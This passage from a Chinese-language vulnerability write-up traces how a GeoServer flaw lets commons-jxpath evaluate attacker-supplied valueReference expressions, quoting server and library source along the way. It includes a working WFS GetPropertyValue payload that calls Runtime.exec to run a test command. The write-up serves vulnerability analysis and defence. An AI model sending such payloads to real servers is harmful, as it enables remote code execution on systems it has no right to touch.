<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span><span class=n>exec</span><span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>lang</span><span class=o>.</span><span class=na>Runtime</span><span class=o>.</span><span class=na>getRuntime</span><span class=o>(),</span><span class=err>'</span><span class=n>touch</span> <span class=o>/</span><span class=n>tmp</span><span class=o>/</span><span class=n>success</span><span class=err>'</span><span class=o>)&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>valueReference</span><span class=o>&gt;</span>
<span class=o>&lt;/</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span><span class=o>&gt;</span>
</pre></div>
<p>会报错，这是正常的。</p>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202113-7d8a89e8-7a6f-1.png><img src="data:image/png;base64,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
<h2 id=toc-4>漏洞分析</h2>
<p>我们知道漏洞的根源在于 commons-jxpath。根据发布的公告：</p>
<p>没有提供公开的 PoC，但已确认可通过 WFS GetFeature、WFS GetPropertyValue、WMS GetMap、WMS GetFeatureInfo、WMS GetLegendGraphic 和 WPS Execute 请求利用此漏洞。</p>
<p>我们来看看为什么是这些请求，以及这些请求是做什么的。</p>
<p><strong>WFS 请求</strong>：GeoServer 通过 WFS 实现矢量数据的查询和操作。用户可以通过 GetFeature 请求查询和下载地理特征数据，也可以使用 GetPropertyValue 仅提取感兴趣的属性信息。</p>
<p><strong>WMS 请求</strong>：GeoServer 使用 WMS 服务生成地图图像，并通过 GetMap 返回给用户。GetFeatureInfo 提供了一种交互方式，让用户能够获取地图上特定位置的详细信息。GetLegendGraphic 则用于生成地图的图例，帮助用户理解地图内容。</p>
<p><strong>WPS 请求</strong>：GeoServer 可以通过 WPS Execute 提供空间数据处理服务，允许用户通过简单的网络请求执行复杂的空间分析，而无需自己编写处理逻辑或消耗本地计算资源。</p>
<p>起点就在于这些请求。</p>
<p>我们从 WFS GetPropertyValue 请求开始分析：请求会经过 Dispatcher (org.geoserver.ows) 的 handleRequestInternal:268 方法，进而调用到 getPropertyValue 方法。</p>
<p>请求体如下</p>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202106-78f0b862-7a6f-1.png><img src=data:image/png;base64,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
<p>可以看到,实例化 GetPropertyValue 对象后直接调用其 run 方法</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>ValueCollectionType</span> <span class=nf>getPropertyValue</span><span class=o>(</span><span class=n>GetPropertyValueType</span> <span class=n>request</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>WFSException</span> <span class=o>{</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>GetPropertyValue</span><span class=o>(</span><span class=n>getServiceInfo</span><span class=o>(),</span> <span class=n>getCatalog</span><span class=o>(),</span> <span class=n>filterFactory</span><span class=o>).</span><span class=na>run</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>来到run方法</p>
<p>这里拆开方法来讲</p>
<div class=highlight><pre><span></span><span class=x>if (request.getValueReference() == null) {</span>
<span class=x> throw new WFSException(request, "No valueReference specified", "MissingParameterValue")</span>
<span class=x> .locator("valueReference");</span>
<span class=x>} else if ("".equals(request.getValueReference().trim())) {</span>
<span class=x> throw new WFSException(</span>
<span class=x> request,</span>
<span class=x> "ValueReference cannot be empty",</span>
<span class=x> ServiceException.INVALID_PARAMETER_VALUE)</span>
<span class=x> .locator("valueReference");</span>
<span class=x>}</span>
</pre></div>
<p>首先确保 valueReference 的值不能为 null,trim 之后也不能为空字符串<br>
<a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202059-74c3c446-7a6f-1.png><img src="data:image/png;base64,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
<p>然后</p>
<div class=highlight><pre><span></span><span class=c1>// do a getFeature request</span>
<span class=n>GetFeatureType</span> <span class=n>getFeature</span> <span class=o>=</span> <span class=n>Wfs20Factory</span><span class=o>.</span><span class=na>eINSTANCE</span><span class=o>.</span><span class=na>createGetFeatureType</span><span class=o>();</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setBaseUrl</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getBaseUrl</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>getAbstractQueryExpression</span><span class=o>().</span><span class=na>add</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getAbstractQueryExpression</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setResolve</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getResolve</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setResolveDepth</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getResolveDepth</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setResolveTimeout</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getResolveTimeout</span><span class=o>());</span>
<span class=n>getFeature</span><span class=o>.</span><span class=na>setCount</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getCount</span><span class=o>());</span>
</pre></div>
<p>这里是在构建一个 <code>GetFeature</code> 请求(WFS 的基础请求,用于查询地理要素)。通过 <code>GetPropertyValue</code> 请求,用户实际上是在请求特定地理要素中某个属性的值,所以这里需要先构建一个完整的 <code>GetFeature</code> 请求。</p>
<p>然后这里就是在执行GetFeature请求</p>
<div class=highlight><pre><span></span><span class=n>FeatureCollectionType</span> <span class=n>fc</span> <span class=o>=</span>
<span class=o>(</span><span class=n>FeatureCollectionType</span><span class=o>)</span>
<span class=n>delegate</span><span class=o>.</span><span class=na>run</span><span class=o>(</span><span class=n>GetFeatureRequest</span><span class=o>.</span><span class=na>adapt</span><span class=o>(</span><span class=n>getFeature</span><span class=o>)).</span><span class=na>getAdaptee</span><span class=o>();</span>
</pre></div>
<p>这里可以看到是在从请求的 Query 中获取查询信息(typeName 以及对应的 FeatureTypeInfo)</p>
<div class=highlight><pre><span></span><span class=n>QueryType</span> <span class=n>query</span> <span class=o>=</span> <span class=o>(</span><span class=n>QueryType</span><span class=o>)</span> <span class=n>request</span><span class=o>.</span><span class=na>getAbstractQueryExpression</span><span class=o>();</span>
<span class=n>QName</span> <span class=n>typeName</span> <span class=o>=</span> <span class=o>(</span><span class=n>QName</span><span class=o>)</span> <span class=n>query</span><span class=o>.</span><span class=na>getTypeNames</span><span class=o>().</span><span class=na>iterator</span><span class=o>().</span><span class=na>next</span><span class=o>();</span>
<span class=n>FeatureTypeInfo</span> <span class=n>featureType</span> <span class=o>=</span>
<span class=n>catalog</span><span class=o>.</span><span class=na>getFeatureTypeByName</span><span class=o>(</span><span class=n>typeName</span><span class=o>.</span><span class=na>getNamespaceURI</span><span class=o>(),</span> <span class=n>typeName</span><span class=o>.</span><span class=na>getLocalPart</span><span class=o>());</span>
</pre></div>
<p>下面是重点部分</p>
<p>这里就是在根据请求中的 valueReference 进行处理了</p>
<div class=highlight><pre><span></span><span class=n>PropertyName</span> <span class=n>propertyName</span> <span class=o>=</span>
<span class=n>filterFactory</span><span class=o>.</span><span class=na>property</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>(),</span> <span class=n>getNamespaceSupport</span><span class=o>());</span>
<span class=n>PropertyName</span> <span class=n>propertyNameNoIndexes</span> <span class=o>=</span>
<span class=n>filterFactory</span><span class=o>.</span><span class=na>property</span><span class=o>(</span>
<span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>().</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"\\[.*\\]"</span><span class=o>,</span> <span class=s>""</span><span class=o>),</span>
<span class=n>getNamespaceSupport</span><span class=o>());</span>
<span class=n>AttributeDescriptor</span> <span class=n>descriptor</span> <span class=o>=</span>
<span class=o>(</span><span class=n>AttributeDescriptor</span><span class=o>)</span>
<span class=n>propertyNameNoIndexes</span><span class=o>.</span><span class=na>evaluate</span><span class=o>(</span><span class=n>featureType</span><span class=o>.</span><span class=na>getFeatureType</span><span class=o>());</span>
<span class=kt>boolean</span> <span class=n>featureIdRequest</span> <span class=o>=</span>
<span class=n>FEATURE_ID_PATTERN</span><span class=o>.</span><span class=na>matcher</span><span class=o>(</span><span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>()).</span><span class=na>matches</span><span class=o>();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>descriptor</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=o>!</span><span class=n>featureIdRequest</span><span class=o>)</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>WFSException</span><span class=o>(</span>
<span class=n>request</span><span class=o>,</span> <span class=s>"No such attribute: "</span> <span class=o>+</span> <span class=n>request</span><span class=o>.</span><span class=na>getValueReference</span><span class=o>());</span>
<span class=o>}</span>
</pre></div>
<p>处理的逻辑是在evaluate方法</p>
<p>一路跟进到 AttributeExpressionImpl.java 类的 evaluate 方法,这个方法用于通过属性访问器(PropertyAccessor)从给定对象中提取属性值,也就是对我们传入的 valueReference 进行求值</p>
<p>这里先使用 lastAccessor(即缓存的上一个访问器)尝试访问;如果它不能处理,或者 get 抛出异常,success 保持为 false,就会走到下面的逻辑</p>
<div class=highlight><pre><span></span><span class=n>PropertyAccessor</span> <span class=n>accessor</span> <span class=o>=</span> <span class=n>lastAccessor</span><span class=o>;</span>
<span class=k>if</span> <span class=o>(</span><span class=n>accessor</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>accessor</span><span class=o>.</span><span class=na>canHandle</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>))</span> <span class=o>{</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>value</span> <span class=o>=</span> <span class=n>accessor</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>);</span>
<span class=n>success</span> <span class=o>=</span> <span class=kc>true</span><span class=o>;</span>
<span class=o>}</span> <span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// fine, we'll try another accessor</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>这里就是用其他的访问器去寻找属性。PropertyAccessors.findPropertyAccessors() 方法是主要逻辑,根据对象、属性路径(<code>attPath</code>)和目标类型寻找所有合适的 <code>PropertyAccessor</code>,然后逐个调用 get,直到有一个成功为止</p>
<div class=highlight><pre><span></span><span class=k>if</span> <span class=o>(!</span><span class=n>success</span><span class=o>)</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>namespaceSupport</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>hints</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>hints</span> <span class=o>=</span> <span class=k>new</span> <span class=n>Hints</span><span class=o>(</span><span class=n>PropertyAccessorFactory</span><span class=o>.</span><span class=na>NAMESPACE_CONTEXT</span><span class=o>,</span> <span class=n>namespaceSupport</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>PropertyAccessor</span><span class=o>&gt;</span> <span class=n>accessors</span> <span class=o>=</span>
<span class=n>PropertyAccessors</span><span class=o>.</span><span class=na>findPropertyAccessors</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>,</span> <span class=n>hints</span><span class=o>);</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>Exception</span><span class=o>&gt;</span> <span class=n>exceptions</span> <span class=o>=</span> <span class=kc>null</span><span class=o>;</span>
<span class=k>if</span> <span class=o>(</span><span class=n>accessors</span> <span class=o>!=</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=k>for</span> <span class=o>(</span><span class=n>PropertyAccessor</span> <span class=n>propertyAccessor</span> <span class=o>:</span> <span class=n>accessors</span><span class=o>)</span> <span class=o>{</span>
<span class=n>accessor</span> <span class=o>=</span> <span class=n>propertyAccessor</span><span class=o>;</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>value</span> <span class=o>=</span> <span class=n>accessor</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>obj</span><span class=o>,</span> <span class=n>attPath</span><span class=o>,</span> <span class=n>target</span><span class=o>);</span>
<span class=n>success</span> <span class=o>=</span> <span class=kc>true</span><span class=o>;</span>
<span class=k>break</span><span class=o>;</span>
<span class=o>}</span> <span class=k>catch</span> <span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// fine, we'll try another accessor</span>
<span class=k>if</span> <span class=o>(</span><span class=n>exceptions</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>exceptions</span> <span class=o>=</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;&gt;();</span>
<span class=o>}</span>
<span class=n>exceptions</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>找到后就使用get方法去提取属性值了</p>
<p>这里找到的属性是</p>
<p>get:271, FeaturePropertyAccessorFactory$FeaturePropertyAccessor (org.geotools.data.complex.expression)</p>
<p>方法如下</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=o>&lt;</span><span class=n>T</span><span class=o>&gt;</span> <span class=n>T</span> <span class=nf>get</span><span class=o>(</span><span class=n>Object</span> <span class=n>object</span><span class=o>,</span> <span class=n>String</span> <span class=n>xpath</span><span class=o>,</span> <span class=n>Class</span><span class=o>&lt;</span><span class=n>T</span><span class=o>&gt;</span> <span class=n>target</span><span class=o>)</span>
<span class=kd>throws</span> <span class=n>IllegalArgumentException</span> <span class=o>{</span>
<span class=n>JXPathContext</span> <span class=n>context</span> <span class=o>=</span>
<span class=n>JXPathUtils</span><span class=o>.</span><span class=na>newSafeContext</span><span class=o>(</span><span class=n>object</span><span class=o>,</span> <span class=kc>false</span><span class=o>,</span> <span class=k>this</span><span class=o>.</span><span class=na>namespaces</span><span class=o>,</span> <span class=kc>true</span><span class=o>);</span>
<span class=n>Iterator</span> <span class=n>it</span> <span class=o>=</span> <span class=n>context</span><span class=o>.</span><span class=na>iteratePointers</span><span class=o>(</span><span class=n>xpath</span><span class=o>);</span>
<span class=n>List</span> <span class=n>results</span> <span class=o>=</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;&gt;();</span>
<span class=k>while</span> <span class=o>(</span><span class=n>it</span><span class=o>.</span><span class=na>hasNext</span><span class=o>())</span> <span class=o>{</span>
<span class=n>Pointer</span> <span class=n>pointer</span> <span class=o>=</span> <span class=o>(</span><span class=n>Pointer</span><span class=o>)</span> <span class=n>it</span><span class=o>.</span><span class=na>next</span><span class=o>();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pointer</span> <span class=k>instanceof</span> <span class=n>AttributeNodePointer</span><span class=o>)</span> <span class=o>{</span>
<span class=n>results</span><span class=o>.</span><span class=na>add</span><span class=o>(((</span><span class=n>AttributeNodePointer</span><span class=o>)</span> <span class=n>pointer</span><span class=o>).</span><span class=na>getImmediateAttribute</span><span class=o>());</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=n>results</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>pointer</span><span class=o>.</span><span class=na>getValue</span><span class=o>());</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>if</span> <span class=o>(</span><span class=n>results</span><span class=o>.</span><span class=na>isEmpty</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IllegalArgumentException</span><span class=o>(</span><span class=s>"x-path gives no results."</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=k>if</span> <span class=o>(</span><span class=n>results</span><span class=o>.</span><span class=na>size</span><span class=o>()</span> <span class=o>==</span> <span class=mi>1</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=o>(</span><span class=n>T</span><span class=o>)</span> <span class=n>results</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=mi>0</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=k>return</span> <span class=o>(</span><span class=n>T</span><span class=o>)</span> <span class=n>results</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>重点是在iteratePointers方法</p>
<p>观察调用栈就明白了</p>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202043-6bb3b640-7a6f-1.png><img src=data:image/png;base64,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
<p>valueReference 会被交给 commons-jxpath 进行解析和求值,我们输入中的函数调用也会被一并执行,这就是恶意调用的来源</p>
<p>一路跟进到下面的 computeValue 方法</p>
<div class=highlight><pre><span></span><span class=x>public Object computeValue(EvalContext context) {</span>
<span class=x> Object[] parameters = null;</span>
<span class=x> if (args != null) {</span>
<span class=x> parameters = new Object[args.length];</span>
<span class=x> for (int i = 0; i &lt; args.length; i++) {</span>
<span class=x> parameters[i] = convert(args[i].compute(context));</span>
<span class=x> }</span>
<span class=x> }</span>
<span class=x> Function function =</span>
<span class=x> context.getRootContext().getFunction(functionName, parameters);</span>
<span class=x> if (function == null) {</span>
<span class=x> throw new JXPathFunctionNotFoundException("No such function: "</span>
<span class=x> + functionName + Arrays.asList(parameters));</span>
<span class=x> }</span>
<span class=x> Object result = function.invoke(context, parameters);</span>
<span class=x> return result instanceof NodeSet ? new NodeSetContext(context,</span>
<span class=x> (NodeSet) result) : result;</span>
<span class=x>}</span>
</pre></div>
<p>重点在于 function.invoke(context, parameters) 这一行</p>
<p>调用invoke方法</p>
<div class=highlight><pre><span></span><span class=x>public Object invoke(ExpressionContext context, Object[] parameters) {</span>
<span class=x> try {</span>
<span class=x> Object target;</span>
<span class=x> Object[] args;</span>
<span class=x> if (Modifier.isStatic(method.getModifiers())) {</span>
<span class=x> target = null;</span>
<span class=x> if (parameters == null) {</span>
<span class=x> parameters = EMPTY_ARRAY;</span>
<span class=x> }</span>
<span class=x> int pi = 0;</span>
<span class=x> Class[] types = method.getParameterTypes();</span>
<span class=x> if (types.length &gt;= 1</span>
<span class=x> &amp;&amp; ExpressionContext.class.isAssignableFrom(types[0])) {</span>
<span class=x> pi = 1;</span>
<span class=x> }</span>
<span class=x> args = new Object[parameters.length + pi];</span>
<span class=x> if (pi == 1) {</span>
<span class=x> args[0] = context;</span>
<span class=x> }</span>
<span class=x> for (int i = 0; i &lt; parameters.length; i++) {</span>
<span class=x> args[i + pi] =</span>
<span class=x> TypeUtils.convert(parameters[i], types[i + pi]);</span>
<span class=x> }</span>
<span class=x> }</span>
<span class=x> else {</span>
<span class=x> int pi = 0;</span>
<span class=x> Class[] types = method.getParameterTypes();</span>
<span class=x> if (types.length &gt;= 1</span>
<span class=x> &amp;&amp; ExpressionContext.class.isAssignableFrom(types[0])) {</span>
<span class=x> pi = 1;</span>
<span class=x> }</span>
<span class=x> target =</span>
<span class=x> TypeUtils.convert(</span>
<span class=x> parameters[0],</span>
<span class=x> method.getDeclaringClass());</span>
<span class=x> args = new Object[parameters.length - 1 + pi];</span>
<span class=x> if (pi == 1) {</span>
<span class=x> args[0] = context;</span>
<span class=x> }</span>
<span class=x> for (int i = 1; i &lt; parameters.length; i++) {</span>
<span class=x> args[pi + i - 1] =</span>
<span class=x> TypeUtils.convert(parameters[i], types[i + pi - 1]);</span>
<span class=x> }</span>
<span class=x> }</span>
<span class=x> return method.invoke(target, args);</span>
<span class=x> }</span>
<span class=x> catch (Throwable ex) {</span>
<span class=x> if (ex instanceof InvocationTargetException) {</span>
<span class=x> ex = ((InvocationTargetException) ex).getTargetException();</span>
<span class=x> }</span>
<span class=x> throw new JXPathInvalidAccessException("Cannot invoke " + method,</span>
<span class=x> ex);</span>
<span class=x> }</span>
<span class=x>}</span>
</pre></div>
<p>先判断目标方法是静态方法还是实例方法,按不同方式组装参数后,最终通过反射 method.invoke(target, args) 调用对应的方法</p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240924202031-64802dea-7a6f-1.png title><img src="data:image/png;base64,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
<p>这是当时我在 Windows 环境下的截图</p>
<p>最后再来解释一下 payload</p>
<div class=highlight><pre><span></span><span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>GetPropertyValue</span> <span class=n>service</span><span class=o>=</span><span class=err>'</span><span class=n>WFS</span><span class=err>'</span> <span class=n>version</span><span class=o>=</span><span class=err>'</span><span class=mf>2.0.0</span><span class=err>'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>topp</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.openplans.org/topp'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>fes</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/fes/2.0'</span>
<span class=n>xmlns</span><span class=o>:</span><span class=n>wfs</span><span class=o>=</span><span class=err>'</span><span class=n>http</span><span class=o>:</span><span class=c1>//www.opengis.net/wfs/2.0'&gt;</span>
<span class=o>&lt;</span><span class=n>wfs</span><span class=o>:</span><span class=n>Query</span> <span class=n>typeNames</span><span class=o>=</span><span class=err>'</span><span class=n>sf</span><span class=o>:</span><span class=n>archsites</span><span class=err>'</span><span class=o>/&gt;</span>
